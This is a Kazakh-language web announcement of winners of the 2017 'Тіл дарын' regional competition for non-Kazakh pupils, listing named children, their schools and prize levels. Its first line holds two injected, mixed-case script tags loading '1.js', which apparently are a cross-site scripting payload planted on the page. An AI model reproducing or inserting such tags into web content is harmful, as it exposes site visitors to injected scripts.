<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.12.2017

Өзге ұлт өкілдерінің 2-11 сыныптары оқушыларының

шығармашылық жобалары бойынша «Тіл дарын»

облыстық байқауының өткізу туралы ақпарат

 

2017  жылдың 29 - 31 қазан аралығында Көкшетау қаласы, №3 облыстық дарынды балаларға арналған мамандандырылған  мектеп –интернатының базасында өзге ұлт өкілдерінің 2-11 сынып оқушыларының арасында шығармашылық жобалары бойынша «Тіл дарын» облыстық байқауы өткізілді.

            Байқау «Рухани жаңғыру» бағдарламасы аясында өткізіледі. 

Шығармашылық байқаудың мақсаттары мен міндеттері: 

- өзге ұлт өкілдері оқушыларының зерттеу және оқу - танымдық қызметін ынталандыру;

- оқушылардың үздік жетістіктерін көрсету және насихаттау, өзара қарым-қатынастарын ұйымдастыру, коммуникативтік мәдениетін дамыту; 

- Қазақстан Республикасының зияткерлік әлеуетін қалыптастыруға ықпал ету;

- өзге ұлт өкілдері оқушыларының мемлекеттік тілді оқып-үйренуіне ықпал жасау және ынталандыру.

Байқаудың облыстық кезеңіне 136 оқушы қатысты. Жұмыстың мазмұны қазақ тілінде және келесі секциямен ұсынылды:

2-4 сынып үшін:

- Менің шежірем.

- Менің шағын Отаным.

- Астана-арман қала.

- Қазақ халқының музыкалық

өнері.

5-8 сынып үшін:

- Менің ауылымның

тарихы.

- Қазақ халқының салт-дәстүрі.

- Қазақ халқының музыкалық

өнері.

- Мемлекеттік тілдің мәртебесі.

9-11 сынып үшін:

-

Жасыл энергетика.

-

Робототехника.

- Мемлекеттік тілдің мәртебесі.

-

Қазақстанның ұлттық-қолданбалы өнері. 

Байқауға қатысудың қорытындысы бойынша жеңімпаз ретінде атанып Ақмола облысы білім басқармасының І дәрежелі дипломымен және 110 мың теңге ақшалай сертификатымен келесі оқушылар марапатталды:

1.Нимиткин Руслан - Зеренді ауданы, Абай орта мектебінің 3 сынып оқушысы;

2.Смирнов Виктор - Жарқайың ауданы, Қарасу негізгі мектебінің 7 сынып оқушысы;

3.Шелопутова Алина - Көкшетау қаласы, №3 дарынды балаларға арналған облыстық мамандандырылған мектеп-интернатының 11 сынып оқушысы;

4.Хомич Евгений -  Бурабай ауданы, №9 мектеп-гимназиясының 9 сынып оқушысы;

5.Шаповалова Кристина - Көкшетау қаласы, №21 орта мектеп-лицейінің 4 сынып оқушысы;

6.Кочетыгов Юрий - Көкшетау қаласы, №3 мектеп-гимназиясының 8 сынып оқушысы;

7.Гетманец Руслан - Степногорск қаласы, Л.Толстой атындағы №4 мектеп-гимназиясының 10 сынып оқушысы;

8.Ложкина Дарья - Жарқайың ауданы, Крупский атындағы орта мектебінің 4 сынып оқушысы;

9.Абдисаламов Оятулло - Сандықтау ауданы, №1 Балкашин орта мектебінің 4 сынып оқушысы;

10.Стаматова Виктория - Еңбекшілдер ауданы, Макин орта мектебінің 8 сынып оқушысы;

11.Геласимов Евгений - Көкшетау қаласы, №16 орта мектебінің 7 сынып оқушысы.

ІІ дәрежелі дипломымен және 90 мың теңге ақшалай

сертификатымен марапатталады:

1.Исаева Гюнай - Аршалы ауданы, Новоалександр орта мектебінің 2 сынып оқушысы;

2.Супьева Дарья - Бұланды ауданы Макинск мектеп гимназиясының 4 сынып оқушысы;

3.Полторацкая Дарья - Бурабай ауданы, №3 орта мектебінің 2 сынып оқушысы;

4.Бякярис Любовь - Ақкөл ауданы, №2 Ақкөл орта мектебінің 5 сынып оқушысы;

5.Дильман Наталья - Аршалы ауданы, Новоалександр орта мектебінің 8 сынып оқушысы;

6.Примаков Иван - Есіл ауданы, №3 орта мектебінің 4  сынып оқушысы;

7.Цейтлер Илья - Шортанды ауданы, Пригород орта мектебінің 4 сынып оқушысы;

8.Галимханов Гумар - Астрахан ауданы, №1 Астрахан орта мектебінің 11 сынып оқушысы;

9.Пельч Константин - Жақсы ауданы, Калинин негізгі мектебінің 9 сынып оқушысы;

10.Насипова Сивиль - Атбасар ауданы, №2 орта мектебінің 11 сынып оқушысы;

11.Поторочина Александра - Ерейментау ауданы, Т.Шаханов атындағы №3 орта мектебінің 5 сынып оқушысы; 

12.Филатов Никита - Көкшетау қаласы, №11 орта мектеп-гимназиясының 10 сынып оқушысы;

13.Дедейко Надежда - Есіл ауданы, №3 орта мектебінің 4 сынып оқушысы;  

14.Олейников Данил - Целиноград ауданы, Қоянды орта мектебінің 3 сынып оқушысы;

15.Шатунова Надежда - Астрахан ауданы, Камышенская орта мектебінің 8 сынып оқушысы;

16.Хатмулин Артем - Зеренді ауданы, Березняковка орта мектебінің 7 сынып оқушысы;

17.Шаповал Милана - Егіндікөл ауданы, №1 орта мектебінің 7 сынып оқушысы;

18.Абишев Черкес - Целиноград ауданы, Жалғызқұдық № 24 орта мектебінің 8 сынып оқушысы.

ІІІ дәрежелі дипломымен және 70 мың теңге ақшалай

сертификатымен марапатталды:                                  

1.Фаст София - Ақкөл ауданы, Горький атындағы орта мектебінің 3 сынып оқушысы;

2.Чаленко Дмитрий - Бурабай ауданы Оқжетпес орта мектебінің 2 сынып оқушысы;

3.Втюрин Богдан - Жарқайың ауданы, Кен негізгі мектебінің 3 сынып оқушысы;

4.Малыхина Анфиса - Аршалы ауданы, Новоалександр орта мектебінің 4 сынып оқушысы;

5.Кистнер Николь - Ерейментау ауданы, Т.Шаханов атындағы №3 орта мектебінің 2 сынып оқушысы;

6.Лактюшина Лилия - Көкшетау қаласы, №15 негізгі мектебінің 4 сынып оқушысы;

7.Соколова Екатерина - Ерейментау ауданы, Т.Шаханов атындағы №3 орта мектебінің 10 сынып оқушысы;

8.Чернышева Изабелла -Көкшетау қаласы, № 2 орта мектеп –лицейінің 11 сынып оқушысы;

9.Шамилов Кемаль - Атбасар ауданы, №2 орта мектебінің 2 сынып оқушысы;

10.Каюпова Мөлдір - Атбасар ауданы, №7 орта мектебі 4 сынып оқушысы;

11.Облоеров Бекмурод - Целиноград ауданы, №6 Қараөткел орта мектебінің    2 сынып оқушысы;

12.Курыпова Вероника - Ерейментау ауданы, Т.Шаханов атындағы №3  орта мектебінің    6 сынып оқушысы;

13.Заводчикова Валентина - Қорғалжын ауданы Жұмай негізгі мектебінің 8 сынып оқушысы;

14.Ибрагимова Фатима - Астана қаласы, дарынды балаларға арналған №2 облыстық мамандандырылған мектеп-интернатының 7 сынып оқушысы;

15.Харькова Анастасия - Ақкөл ауданы, №2 Ақкөл орта мектебінің 10 сынып оқушысы;

16.Карпенко Роман - Зеренді ауданы, Приречен орта мектебінің 7 сынып оқушысы;

17.Головченко Даниил - Жарқайың ауданы, Островский атындағы орта мектебінің 10 сынып оқушысы;

18.Савлук Артур - Степногорск қаласы, дарынды балаларға арналған №4 облыстық мамандандырылған мектеп-интернатының 10 сынып оқушысы;

19.Гайнутдинова Евгения - Есіл ауданы, №2 орта мектебінің 9 сынып оқушысы;

20.Шулепова Любовь - Сандықтау ауданы, Максимовка орта мектебінің 9 сынып оқушысы;

21.Парфенова Елена - Сандықтау ауданы, Сандықтау орта мектебінің  9 сынып оқушысы;

22.Шарапов Эмрэ - Бурабай ауданы, Қ.Сәтбаев атындағы орта мектебінің 2 сынып оқушысы;

23.Доценко Валерия - Ерейментау ауданы, Т.Шаханов атындағы №3 орта мектебінің 8 сынып оқушысы;

24.Щитка Варвара - Жақсы ауданы, К.Өскенбаев атындағы Қима орта мкетебінің 4 сынып оқушысы;

25.Кулешова Ксения - Целиноград ауданы, №5 Ақмол  орта мектебінің 5 сынып оқушысы;

26.Астимович Альнадир - Шортанды ауданы, Новокубан орта мектебінің   2 сынып оқушысы;

27.Майер Алина - Аршалы ауданы, Новоалександр орта мектебінің   6 сынып оқушысы;

28.Чувашкина Екатерина - Есіл ауданы, С.Серіков атындағы орта мектебінің 7 сынып оқушысы;

29.Илязова Айгерим - Степногорск қаласы, А.Пушкин атындағы көпсалалы мектеп- лицейінің 5 сынып оқушысы.

Барлық қатысушыларға қатысқан үшін сертификат берілді.

«Тіл дарын» облыстық байқауының жеңімпаздарын құттықтаймыз, болашақта табыс тілейміз!

Просмотров: 562


Пікір қосу



Деректерді қолтаңбаға қосу